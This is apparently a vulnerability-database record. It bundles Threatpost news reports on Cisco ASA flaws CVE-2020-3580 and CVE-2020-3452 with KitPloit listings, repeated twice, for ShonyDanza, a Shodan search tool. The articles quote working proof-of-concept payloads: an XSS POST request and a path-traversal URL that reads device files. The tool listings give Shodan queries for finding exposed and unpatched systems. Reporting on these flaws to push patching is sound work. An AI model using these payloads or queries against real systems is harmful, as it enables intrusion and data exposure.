5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-06-25T17:22:55", "description": "Researchers have dropped a proof-of-concept (PoC) exploit on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA). The move comes as reports surface of in-the-wild exploitation of the bug.\n\nResearchers at Positive Technologies published the PoC for the bug (CVE-2020-3580) on Thursday. One of the researchers there, Mikhail Klyuchnikov, noted that there were a heap of researchers now chasing after an exploit for the bug, which he termed \u201clow-hanging\u201d fruit.\n\n> \ud83c\udf81PoC for XSS in Cisco ASA (CVE-2020-3580)\n> \n> POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 \nHost: ciscoASA.local \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 44\n> \n> SAMLResponse=\"><svg/onload=alert('PTSwarm')> [pic.twitter.com/c53MKSK9bg](<https://t.co/c53MKSK9bg>)\n> \n> \u2014 PT SWARM (@ptswarm) [June 24, 2021](<https://twitter.com/ptswarm/status/1408050644460650502?ref_src=twsrc%5Etfw>)\n\n> The hunt for low hanging CVE-2020-3580 by [@ptswarm](<https://twitter.com/ptswarm?ref_src=twsrc%5Etfw>) has begun. \nA lot of submissions/duplicates are waiting for [@Bugcrowd](<https://twitter.com/Bugcrowd?ref_src=twsrc%5Etfw>) and [@Hacker0x01](<https://twitter.com/Hacker0x01?ref_src=twsrc%5Etfw>) [#bugbounty](<https://twitter.com/hashtag/bugbounty?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 n1 (@__mn1__) [June 24, 2021](<https://twitter.com/__mn1__/status/1408064449835978760?ref_src=twsrc%5Etfw>)\n\nMeanwhile, Tenable researchers published an alert about the PoC, noting that it has started to see cyberattacks using the vulnerability on targets in the wild.\n\n\u201cTenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\u201d according to its [Thursday alert](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>). \u201cWith this new information, Tenable recommends that organizations prioritize patching CVE-2020-3580.\u201d\n\nAnd indeed, the PT PoC tweet was met with plenty of \u201cOoh thanks\u201d and \u201cthank you so much\u201d responses, presumably from would-be hackers.\n\n> Thanks\ud83d\ude00, do we have to be authenticated?\n> \n> \u2014 Qasim (@00x88x) [June 24, 2021](<https://twitter.com/00x88x/status/1408069865798131726?ref_src=twsrc%5Etfw>)\n\nMeanwhile, researchers at WebSec noted that the bug could be exploited for more than XSS:\n\n> You could have gotten 2 CVE numbers for this, as this is not just XSS but also CSRF.\n> \n> \u2014 WebSec (@websecnl) [June 25, 2021](<https://twitter.com/websecnl/status/1408344288900128769?ref_src=twsrc%5Etfw>)\n\n\u201cResearchers often develop PoCs before reporting a vulnerability to a developer and publishing them allows other researchers to both check their work and potentially dig further and discover other issues,\u201d Claire Tills, senior research engineer at Tenable, told Threatpost. \u201cPoCs can also be used by defenders to develop detections for vulnerabilities. Unfortunately, giving that valuable information to defenders means it can also end up in the hands of attackers.\u201d\n\nGiven that a patch has been available for this vulnerability for several months, organizations are able to protect themselves which isn\u2019t the case with 0-day disclosures, she pointed out. \u201cHowever, unpatched vulnerabilities continue to haunt many organizations,\u201d Tillis added. \u201cThe public availability of a PoC is another stark reminder that effective patching is a vital step for organizations to protect themselves.\u201d\n\n## **Real-World Attacks for Cisco ASA**\n\nThe Cisco ASA is a [cybersecurity perimeter-defense appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) that combines firewall, antivirus, intrusion prevention and virtual private network (VPN) capabilities, all meant to stop threats from making it onto corporate networks. A compromise of the device is akin to unlocking the front door of the castle for storming cyberattackers.\n\nXSS attacks occur when malicious scripts are injected into otherwise benign and trusted websites; any visitors to the compromised websites are thus subject to drive-by attacks.\n\nSuccessful exploitation in this case means that unauthenticated, remote attackers could \u201cexecute arbitrary code within the [ASA] interface and access sensitive, browser-based information,\u201d Tenable added.\n\n[](<https://threatpost.com/newsletter-sign/>) \nOnce in, they could modify the device\u2019s configuration, according to Leo Pate, an application security consultant at nVisium.\n\nHowever, the target would need to be logged into the ASA for the attackers to see any joy. \u201cWhile this sounds dangerous, exploiting this vulnerability requires an administrative user to login and navigate to the webpage where the attacker uploaded the malicious code,\u201d he added.\n\nAs Tenable researchers said: \u201cAn attacker would need to convince \u2018a user of the interface\u2019 to click on a specially crafted link.\u201d This can be accomplished via a spear-phishing email campaign targeting probable ASA users using malicious links, or via watering-hole attacks.\n\n\u201cThe attack vector to get this in the hands of the right people is complex requiring a firewall administrator to be duped into clicking a cleverly crafted link,\u201d Andrew Barratt, managing principal for solutions and investigations at Coalfire, told Threatpost. \u201cFirewall administrators will need to ensure they\u2019re not accessing links to the ASA interface that appear to originate from outside.\u201d\n\nTenable declined to provide more information on the real-world attacks when asked by Threatpost.\n\nThanks to the sheer size of its footprint (including inside Fortune 500 companies), the Cisco ASA is no stranger to attention from cyberattackers. Last year for example, public PoC for another bug in the device ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) started making the rounds, leading to a [spate of exploitation efforts](<https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/>).\n\n## **Patch Now: Cisco ASA XSS Security Hole**\n\nThe flaw tracked as CVE-2020-3580 [was patched](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe>) on October 21 as part of a group of XSS issues in Cisco\u2019s ASA as well as the Firepower Threat Defense (FTD) software, which is a unified firewall image that includes ASA management.\n\n\u201cAll four vulnerabilities exist because Cisco ASA and FTD software web services do not sufficiently validate user-supplied inputs,\u201d according to the advisory, which noted that the bug in question rates 6.1 out of 10 on the CVSSv3 vulnerability-severity scale.\n\nThe number of vulnerable devices could be significant: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) last year found there to be 85,000 internet-accessible ASA devices. Of course, a good percentage of those could be patched against this particular vulnerability.\n\n\u201cExploits for appliances that may sit on the vanishing perimeter generally garner interest [from hackers], but fortunately in this case there are at least two things working against rampant exploitation,\u201d Tim Wade, technical director for the CTO team at Vectra, told Threatpost. \u201cFirst, a patch has been available since October. Second, an element of social engineering is required. This should provide some level of confidence for organizations with reasonable patch cycles and a security awareness program.\u201d\n\nUpdating to the latest versions of the affected devices\u2019 software is of course recommended; however, there\u2019s more that can be done to mitigate the vulnerability, nVisium\u2019s Pate noted.\n\n\u201cOrganizations can ask their internal teams if they need to use the web management interface, and if so, is it available to everyone on the internet or just internally to our organization? If the web management interface isn\u2019t needed, then it should be disabled,\u201d he told Threatpost.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-25T16:08:38", "type": "threatpost", "title": "Cisco ASA Bug Now Actively Exploited as PoC Drops", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-25T16:08:38", "id": "THREATPOST:0499757784EF5DB6F115661A76B7C352", "href": "https://threatpost.com/cisco-asa-bug-exploited-poc/167274/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:16:12", "description": "Cisco is warning that a high-severity flaw in its network security software is being actively exploited \u2013 allowing remote, unauthenticated attackers to access sensitive data.\n\nPatches for the vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) in question, which ranks 7.5 out of 10 on the CVSS scale, were [released last Wednesday](<https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/>). However, attackers have since been targeting vulnerable versions of the software, where the patches have not yet been applied.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code and active exploitation of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw specifically exists in the web services interface of Firepower Threat Defense (FTD) software, which is part of Cisco\u2019s suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\nThe potential threat surface is vast: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) recently found 85,000 internet-accessible ASA/FTD devices. Worse, 398 of those are spread across 17 percent of the Fortune 500, researchers said.\n\nThe flaw stems from a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the flaw allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\nSoon after patches were released, proof-of-concept (POC) exploit code was [released Wednesday](<https://twitter.com/aboul3la>) for the flaw by security researcher Ahmed Aboul-Ela.\n\nA potential attacker can view more sensitive files within the web services file system: The web services files may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\n> There\u2019s a proof of concept doing the rounds for directory path traversal (yes, it\u2019s 1998 again) in Cisco AnyConnect SSL VPN. \n> \n> It\u2019s already being mass spammed across internet. \n> \n> As far as I can see people can only read LUA source files so far, so not terribly problematic as is. <https://t.co/kSIFQdz1go>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [July 24, 2020](<https://twitter.com/GossiTheDog/status/1286614404054880256?ref_src=twsrc%5Etfw>)\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/27115136/cisco-vulnerability-patch.png>)\n\nCredit: Rapid7\n\nResearchers with Rapid7 say that since the patch was issued, only about 10 percent of Cisco ASA/FTD devices detected as internet-facing have been rebooted \u2013 which is a \u201clikely indicator they\u2019ve been patched.\u201d Only 27 of the 398 detected in Fortune 500 companies appear to have been rebooted.\n\nResearchers encourage immediate patching of vulnerable ASA/FTD installations \u201cto prevent attackers from obtaining sensitive information from these devices which may be used in targeted attacks.\u201d\n\n\u201cCisco has provided fixes for all supported versions of ASA and FTD components,\u201d said researchers. \u201cCisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.\u201d\n\n_**Complimentary Threatpost Webinar**: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts together to explore how **Confidential**** Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar._\n", "cvss3": {}, "published": "2020-07-27T16:23:16", "type": "threatpost", "title": "Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452"], "modified": "2020-07-27T16:23:16", "id": "THREATPOST:FB3A73274A678D5DA8D5263B9E1A1DA1", "href": "https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:16:17", "description": "A high-severity vulnerability in Cisco\u2019s network security software could lay bare sensitive data \u2013 such as WebVPN configurations and web cookies \u2013 to remote, unauthenticated attackers.\n\nThe flaw exists in the web services interface of Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,\u201d according to a [Wednesday advisory from Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86>). \u201cA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)), which ranks 7.5 out of 10 on the CVSS scale, is due to a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the vulnerability allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\n\u201cThis vulnerability\u2026 is highly dangerous,\u201d said Mikhail Klyuchnikov of Positive Technologies, who was credited with independently reporting the flaw (along with Ahmed Aboul-Ela of RedForce), in a statement provided to Threatpost. \u201cThe cause is a failure to sufficiently verify inputs. An attacker can send a specially crafted HTTP request to gain access to the file system (RamFS), which stores data in RAM.\u201d\n\nA potential attacker can view files within the web services file system only. The web services file system is enabled for specific WebVPN and AnyConnect features (outlined in Cisco\u2019s advisory). The web services files that the attacker can view may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\nTo eliminate the vulnerability, Klyuchnikov urged Cisco users to update Cisco ASA to the most recent version. Cisco said it\u2019s not aware of any malicious exploits for the vulnerability \u2013 however, it is aware of proof-of-concept (POC) exploit code [released Wednesday](<https://twitter.com/aboul3la>) by security researcher Ahmed Aboul-Ela.\n\n> Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\n> \n> For example to read \"/+CSCOE+/portal_inc.lua\" file.\n> \n> https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n> \n> Happy Hacking! [pic.twitter.com/aBA3R7akkC](<https://t.co/aBA3R7akkC>)\n> \n> \u2014 Ahmed Aboul-Ela (@aboul3la) [July 22, 2020](<https://twitter.com/aboul3la/status/1286012324722155525?ref_src=twsrc%5Etfw>)\n\nEarlier in May, Cisco stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) across its ASA and FTD network security products. The flaws could be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "cvss3": {}, "published": "2020-07-23T19:49:49", "type": "threatpost", "title": "Cisco Network Security Flaw Leaks Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452", "CVE-2020-5135"], "modified": "2020-07-23T19:49:49", "id": "THREATPOST:C51D2F2366676BB018956D93916AC33E", "href": "https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:24", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n\ndictionary below to add it to your shonydanza stock searches menu #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) STOCK_SEARCHES = { 'ANONYMOUS_FTP':'ftp anonymous ok', 'RDP':'port:3389 has_screenshot:true', 'OPEN_TELNET':'port:23 [console](<https://www.kitploit.com/search/label/Console> \"console\" ) [gateway](<https://www.kitploit.com/search/label/Gateway> \"gateway\" ) -password', 'APACHE_DIR_LIST':'http.title:\"Index of /\"', 'SPRING_BOOT':'http.favicon.hash:116323821', 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', 'DOCKER_API':'\"Docker Containers:\" port:2375', 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' } #OPTIONAL #IP or cidr range constraint for searches that return list of IP addresses #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) #NET_RANGE = '0.0.0.0/0' \">\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2020-3452
